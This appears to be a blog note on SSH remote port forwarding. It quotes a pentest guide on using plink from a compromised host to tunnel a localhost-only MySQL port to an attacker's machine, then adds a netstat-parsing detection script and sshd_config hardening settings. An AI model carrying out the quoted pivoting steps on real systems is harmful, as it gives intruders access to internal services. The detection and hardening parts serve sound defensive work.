ssh remote port forwarding
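I noticed something odd like the following in netstat, so I looked it up.
sshd: root@pt
Anyway.. it looks like this lets you use port forwarding over ssh from a remote machine..
If it's just a single port, would this be cleaner?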
Remote port forwarding

Remote port forwarding is a crazy, yet very simple concept. So imagine that you have compromised a machine, and that machine has like MySQL running but it is only accessible for localhost. And you can't access it because you have a really crappy shell. So what we can do is just forward that port to our attacking machine. The steps are as follows:

Here is how you create a remote port forwarding:

    ssh <gateway> -R <remote port to bind>:<local host>:<local port>

By the way, plink is a ssh-client for windows that can be run from the terminal. The ip of the attacking machine is 111.111.111.111.

Step 1
So on our compromised machine we do:

    plink.exe -l root -pw mysecretpassword 111.111.111.111 -R 3307:127.0.0.1:3306

Step 2
Now we can check netstat on our attacking machine, we should see something like this:

    tcp 0 0 127.0.0.1:3307 0.0.0.0:* LISTEN 19392/sshd: root@pt

That means that we can connect to that port on the attacking machine from the attacking machine.

Step 3
Connect using the following command:

    mysql -u root -p -h 127.0.0.1 --port=3307
[Link : https://xapax.gitbooks.io/security/content/port_forwarding_and_tunneling.html]
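
The netstat line that prompted this note can be turned into a check for administrators. The script below is an added example, not part of the quoted guide: it lists TCP listeners owned by a per-session sshd process, using constructed sample output, and the function names `find_ssh_forwards` and `sample_netstat` as well as the X11 port range are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the quoted guide). Reads `netstat -tlnp` output on
# stdin (run as root so the PID/Program column is filled in) and reports TCP
# listeners held by a per-session sshd process ("sshd: user@tty"), which is how
# an `ssh -R` bind appears on the SSH server.

find_ssh_forwards() {
    awk '
    # $7 $8 is e.g. "19392/sshd:" "root@pt"; the daemon itself has no "user@".
    $6 == "LISTEN" && $7 ~ /^[0-9]+\/sshd:$/ && $8 ~ /@/ {
        n = split($4, part, ":")
        port = part[n]
        addr = substr($4, 1, length($4) - length(port) - 1)
        pid = $7;  sub(/\/.*/, "", pid)
        user = $8; sub(/@.*/, "", user)
        # Assumption: ports 6010-6099 are treated as likely X11 forwarding
        # (sshd starts X11 listeners at 6010 by default), a common false positive.
        kind = (port + 0 >= 6010 && port + 0 <= 6099) ? "maybe-x11" : "forward"
        # A non-loopback bind is reachable from the network (needs GatewayPorts).
        scope = (addr == "127.0.0.1" || addr == "::1") ? "loopback" : "exposed"
        print kind, scope, addr, port, pid, user
    }'
}

# Constructed sample output; PIDs, users and ports are made up for illustration.
sample_netstat() {
    cat <<'EOF'
Proto Recv-Q Send-Q Local Address     Foreign Address   State    PID/Program name
tcp        0      0 0.0.0.0:22        0.0.0.0:*         LISTEN   812/sshd: /usr/sbin
tcp        0      0 127.0.0.1:3306    0.0.0.0:*         LISTEN   1023/mysqld
tcp        0      0 127.0.0.1:3307    0.0.0.0:*         LISTEN   19392/sshd: root@pt
tcp        0      0 0.0.0.0:8080      0.0.0.0:*         LISTEN   20111/sshd: deploy@
tcp        0      0 127.0.0.1:6010    0.0.0.0:*         LISTEN   20333/sshd: alice@p
EOF
}

# On a live host: netstat -tlnp | find_ssh_forwards
sample_netstat | find_ssh_forwards
```

On the server side, `AllowTcpForwarding no` (or `local`) in sshd_config stops clients from creating these listeners, and `GatewayPorts no` keeps any that remain bound to loopback.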